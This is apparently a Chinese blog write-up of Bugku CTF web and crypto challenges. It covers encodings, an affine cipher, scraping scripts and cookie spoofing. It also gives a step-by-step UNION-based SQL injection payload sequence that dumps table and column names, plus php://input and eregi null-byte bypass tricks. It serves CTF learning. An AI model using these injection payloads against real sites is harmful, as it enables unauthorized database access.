bugku web/crypto 系列题目思路总结(三)

最新推荐文章于 2023-09-10 02:13:30 发布
最新推荐文章于 2023-09-10 02:13:30 发布
阅读量627 收藏 2
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yukinorong/article/details/98745971
版权
本文总结了Bugku平台上的多个Web和Crypto系列的解题思路,涉及Base64编码、进制转换、SQL注入、仿射加密、正则表达式和Cookie欺骗等技术。通过实例解析了如何利用这些技术解决问题,并提供了相关资源链接和解题代码片段,旨在帮助读者提升网络安全技能。
摘要由CSDN通过智能技术生成

bugku 告诉你一个秘密

参考博文:https://www.jianshu.com/p/3cacf1dd479c
需要了解base64编码特征才能想到。
利用键盘位置做密码很巧妙。

bugku 这不是md5

确实不是md5,十六进制字符串直接转字符即可。

bugku 贝斯家族

base编码系列除了64之外还有16 32 36 58 62 91等。后面的数字为用于编码的种类,数字越大,一般来讲编码效率越高。
http://ctf.ssleye.com/base91.html

bugku 富强民主

一个少见编码,核心价值观编码
http://ctf.ssleye.com/cvencode.html

bugku 进制转换

编写脚本,根据首字母进行进制转换即可
代码如下:

def jinzhizhuanhuan(str1):
    strnew = ''
    arr = str1.split(' ')
    for i in arr:
        if(i[0] == 'b'):
            strnew+= chr(int(i[1:],2))
        elif(i[0] == 'd'):
            strnew+= chr(int(i[1:]))
        elif(i[0] == 'x'):
            strnew+= chr(int(i[1:],16))
        elif(i[0] == 'o'):
            strnew+= chr(int(i[1:],8))
    return strnew

bugku affine

这道题属于仿射加密,将字母限制在0-25中,进行运算然后对26取余。
代码如下:

def affineEncode(str):
    newstr = ''
    for i in str:
        newstr += chr(((ord(i)-97)*17+18)%26+97)
    return newstr

def affineDecode(str):
    newstr = ''
    for i in str:
        x = ord(i)-97
        for i in range(26):
            if(x == (17 * i + 18) % 26):
                newstr += chr(i+97)
    return newstr

bugku 来自宇宙的信号

一种特殊字母——标准银河字母(百度上有)。
(枉我对着图片进行各种操作,以为是图片隐写,以为是图片高度问题,以为是符合文件问题,想多了)

bugku 学生成绩查询

一个标准sql注入问题,在这里做积累
此处注入点为id

  1. 先检查是否存在漏洞,id = 1, id = 1’, id = 1’# (#为注释掉后面的语句。)
    在此发现1’出现错误而1’#可以正常运行说明存在注入。
  2. 检查列数。id = 2’ order by 4/5# (猜测有4列还是5列)此处为4列
  3. 使用联合查询,要把前面查询设置为空 id =0’union select 1,2,3,4#(如果不设为空,会把位置用数据填上查询不到)
    id=0' union select 1,database(),user(),version()#(对数据库进行爆破)
    根据数据库查询表名。
    id = 0' union select 1,( select group_concat(table_name) from information_schema.tables where table_schema=database() ),user(),version()#
    根据表名查询字段名
    id = 0' union select 1,( select group_concat(column_name) from information_schema.columns where table_schema='skctf_flag' and table_name='fl4g' ),user(),version()#
    有了表名有了字段名,可以查询具体值

bugku 秋名山老司机

目的是快速反弹post请求。利用python requests库。编写代码

    import requests
    s= requests.Session()
    r = s.get('http://123.206.87.240:8002/qiumingshan/')

    answer = eval(r.text.split('<div>')[1].split('=')[0])
    post = {'value': answer}
    print(s.post('http://123.206.87.240:8002/qiumingshan/', data=post).text)

上述代码,在过滤网页文字得到数字的部分可以利用正则表达式。
eval函数可以直接计算字符串中的算式。
s = re.search(r'^<div>(.*)=\?</div>$', r.text, re.M | re.S)
此处re.M 让正则多行匹配。 re.S让 . 可以匹配换行符

bugku cookies欺骗

http://123.206.87.240:8002/web11/
直接进入的乱码无意义,参数一个是行数和文件名。
文件名末尾有一个= 等号,猜测为base64编码,解码为keys.txt
(可以验证访问http://123.206.87.240:8002/web11/keys.txt。发现index.php可以访问文件的某一行。而目前另一个可访问文件,即当前页面的index.php。)
把index.php编码,写python脚本将整个index.php代码爬下来
代码如下

import requests
code = ''
for i in range(40):
    r = requests.get("http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw")
    code += r.text
print(code)

得到源码:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){  <--- 重要位置
$file_list[2]='keys.php';                                       <--- 重要位置
} 

if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

发现想要访问keys.php,需要将cookie[margin]设置为cookie
我用的chrome插件EditThisCookie。
访问页面 http://123.206.87.240:8002/web11/index.php?line=0&filename=a2V5cy5waHA=
答案在查看源码的第一行被备注了

bugku never give up

首先根据页面源码提示,访问1p.html
发现1p.html网页存在跳转,于是在网址前面加view-source: 直接看源码,得到一串字符。
观察有很多% 先进行unescape。
把脚本部分去掉,后面部分是个base64,继续解码。
又出现了% 继续unescape。
得到php源码。

php stripos(str,s) 输出s第一次出现在str中的位置
php substr(str,num) 截取字符串从Num位置。
php file_get_contents 将文件读入字符串
php eregi(s,str) 现在弃用了的不区分大小写的正则表达式,匹配字符在字符串是否存在

此处发现关键文件,f4l2a3g.txt 直接访问即可得到flag。
本着学习的态度,继续讨论源码。
源码给出了几个要求。
这里借鉴博客 https://www.cnblogs.com/cyc-endeavor/p/10375692.html

做积累:

php伪协议:之前接触过一点,此处由于file_get_contents()函数只能读取数据流。
php://input可以访问原始请求数据中的数据流。这里令 $a = “php://input”,并在请求主体中提交字符串 bugku is a nice plateform!。
eregi(s , str)截断漏洞: s 部分若出现空字符,则会在正则匹配时被截断
例如: substr($b,0,1) = “\x00123”

图南yukino
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Crypto小题总结
qq_46148060的博客
03-23 468
1.MD5 打开后下载题目会出现题目.txt文本文件,打开后出现一行数字和字母,然后用MD5解题工具,就可以解出密码。 按要求提交就可以pass。 2.看我回旋踢 下载后是这样的:synt{5pq1004q-86n5-46q8-o720-oro5on0417r1},看格式像是凯撒密码,用解题工具解码,经过13次解码就可以得到答案,f与s之间有12个单词,也可以从12开始尝试,解码后得到flag。 ...
bugku web/crypto 系列题目思路总结(二)
yukinorong的博客
08-05 422
bugku web4 http://123.206.87.240:8002/web4/ p1 = function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b 后半部分 54aa2aa648cf6e87a7114f1"==a.value)return!...
实验吧Crypto题目Writeup
weixin_33817333的博客
09-08 224
这大概是一篇不怎么更新的没什么用的网上已经有了很多差不多的东西的博客。 变异凯撒 忘记了2333 传统知识+古典密码 先查百度百科,把年份变成数字,然后猜测+甲子的意思,一开始以为是加1,后来意识到是因为六十年一甲子,所以应该+60,于是对前面的所有数字加60,然后接栅栏,得到flag try them all 以现有的能力自己解这题有点费劲,多番尝试之后发现某个SOMD5网站是可以把...
Crypto - Digraphs(Crypto, Training) 详细解法
滕青山博客
03-02 391
分析 这个题目需要大胆猜。题目信息是:将一个英文字母加密为两个字符 密文是这样的(每次刷新都不一样,所以flag也不一样): ierkvkllhwhardjzaahardsxrkvknqlfcxrkjz dynywxhwuvnordnydy rdhvsxnq frnynqnqhallny nqjzwxwxnynqnqrvjzaaaauvlfnthanq vkrkrd rdrkrk dysxrvrvsxwxjzaard nysxrdhvnyhwce hhhanq sxrdav ntnyaaaace ..
crypto14解题思路
szgyunyun的博客
11-20 587
crypto14解题思路 ##二进制 001100110011001100100000001101000011010100100000001101010011000000100000001100100110011000100000001100110011001100100000001101010011011000100000001101000110010100100000001101000011011000100000001101000011011000100000001101100110010000100
python3 Crypto和/crypto-1.4.1.dist-info
04-02
Python3 是一种广泛使用的编程语言,特别是在Web开发和数据分析领域。在进行安全相关的编程时,加密库是必不可少的工具,而 `Crypto` 模块就是Python3中的一个加密库,用于实现各种加密算法和密码学功能。然而,对于...
crypto_callback等个动态库.zip
01-12
crypto.dll、crypto_callback.dll、otp_test_engine.dll,解决emqx start运行无反应问题,下载后解压缩,替换D:\emqx\lib\crypto-4.7\priv\lib下的原来的文件即可解决问题
攻防世界密码学crypto,base64题目环境
03-10
攻防世界密码学crypto,base64题目环境。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/129448000
CTF加密解密-CRYPTO-crypto9 压缩包题目
07-01
CTF加密解密—CRYPTOcrypto9 压缩包题目 CTF加密解密—CRYPTOcrypto9 压缩包题目 CTF加密解密—CRYPTOcrypto9 压缩包题目 CTF加密解密—CRYPTOcrypto9 压缩包题目 CTF加密解密—CRYPTOcrypto9 压缩包题目 ...
Cryproc (CryptoAPI access through /proc)-开源
04-26
总结来说,Cryproc是一个方便的工具,它将内核的CryptoAPI功能暴露给用户空间,使得加密操作变得更加容易且高效。开源的特性则赋予了开发者更大的自由度,可以根据项目需求进行定制,从而在Linux环境中构建更加安全...
提取txt文件中的部分数据
07-31
提取txt中一定规律的数据,存储的是角形的点顺序,接着是点坐标,然后提取点坐标
一些Crypto的基础题
lllwky的博客
04-05 3198
文章目录前言一:一眼就解密 base64 SElTX1NUUklOR30=二:看我回旋踢 synt{:凯撒密码:password四:变异凯撒 ASCII五:Quoted-printable =E9=82=A3六 Rabbit加密 U2FsdGVkX1/七:篱笆墙的影子:栅栏加密八:RSA九:丢失的MD5 unicode十:Alice与Bob素数分解 使用yafu工具,md5十一:rsarsa十二:凯撒大帝十:windows系统密码 md5加密 :::十四:信息化时代下的步伐 数字转中文十五:传统知识+
强网杯部分Crypto题解
Risker
03-26 4031
周末打了两天强网杯,被大佬虐成狗,web狗做不出来去搞密码.... 爆出道密码题,题解如下:题目名称:streamgame1操作:分析下载的压缩包,给了一个python脚本和key,key值16进制打开是12个数,脚本里是用flag值和mask等进行一系列加密算法,最终得到12个key文件里的数,而且flag内容为19位的二进制数字,即2^19种可能。所以写脚本爆破,每次按照给出的算法计算出12...
BUUCTF-Crypto-变异凯撒解题思路
Georgeiweb的博客
10-05 4885
BUUCTF-Crypto-变异凯撒解题思路 题目 加密密文:afZ_r9VYfScOeO_UL^RWUc 格式:flag{} 解答思路 由密文可以看出,有大小写字母,并且还有下划线和阿拉伯数字,所以我们基本可以看出需要使用ASCII码表。 又因为明文flag对应afZ_,所以寻找明文和密文的规律 f-102 a-97 相差5 l-108 f-102 相差6 a-97 Z-90 相差7 g-103 _-95 相差8 可以看出每个字符的偏移量为n+4 所以依
《算法还原 - CTF 》Crypto篇 十题
u014643814的博客
09-10 1604
观察最后的AA,联想到base64编码最后常出现的==,A的ASCII码值为65,=的ASCII的码值为61,分析可能是base64编码做了偏移,尝试将密文所有字符的ASCII码值-4,然后再做base64解码。遍历密文字符串的每个字符,获取它的ascii码值,-4之后转化为新的ASCII字符,拼接转化的字符之后获得还原的base64字符串,然后再做base64解密。这里的4就相当于凯撒密码的密钥。2的七次方为128,每组转换十进制数都减去128寓意二进制去掉了最高位的1。看一下上面这串字符,也是乱序的~
Wechall刷题(Crypto - Transposition I//The Beginning//hi
leeham的博客
08-17 2244
Crypto - Transposition I//The Beginning//hi
BUU-CRYPTO1密码学小白 25道入门题 详细解题思路
晓寒的博客
07-07 6380
文章目录MD5题目解题思路flagUrl编码题目解题思路flag知识点一眼就解密(base64)题目解题思路flag看我回旋踢(凯撒密码)题目解题思路flag摩丝(Morse密码)题目解题思路flagpassword题目解题思路flag变异凯撒题目解题思路flagQuoted-printable题目解题思路flag知识点Rabbit题目解题思路flag知识点篱笆墙的影子(栅栏密码)题目解题思路flag丢失的MD5(还原大师)题目解题思路flagAlice与Bob(大模数分解)题目解题思路flag优化代码大帝
【攻防世界】crypto解题wp
yezhenfule的博客
11-24 1364
密码学写题记录
攻防世界crypto高阶题目
weixin_51216636的博客
10-29 730
1.Broadcast 粗心的Alice在制作密码的时候,把明文留下来,聪明的你能快速找出来吗? flag{fa0f8335-ae80-448e-a329-6fb69048aae4} 2.cr3-what-is-this-encryption Fady同学以为你是菜鸟,不怕你看到他发的东西。他以明文形式将下面这些东西发给了他的朋友 p=0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78e
全栈/Web/Misc/Crypto/Pwn/Re/IoT
最新发布
11-04
全栈是指掌握多种技能的人,能够独立完成一个完整的项目。Web是指基于Web的应用程序,包括前端和后端。Misc是指杂项,包括各种不同类型的题目,如图片隐写、二进制分析等。Crypto是指密码学,包括加密、解密、签名等。Pwn是指利用漏洞攻击程序,获取程序的控制权。Re是指逆向工程,包括反汇编、调试等。IoT是指物联网,包括各种智能设备和传感器。这些都是CTF比赛中常见的方向。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值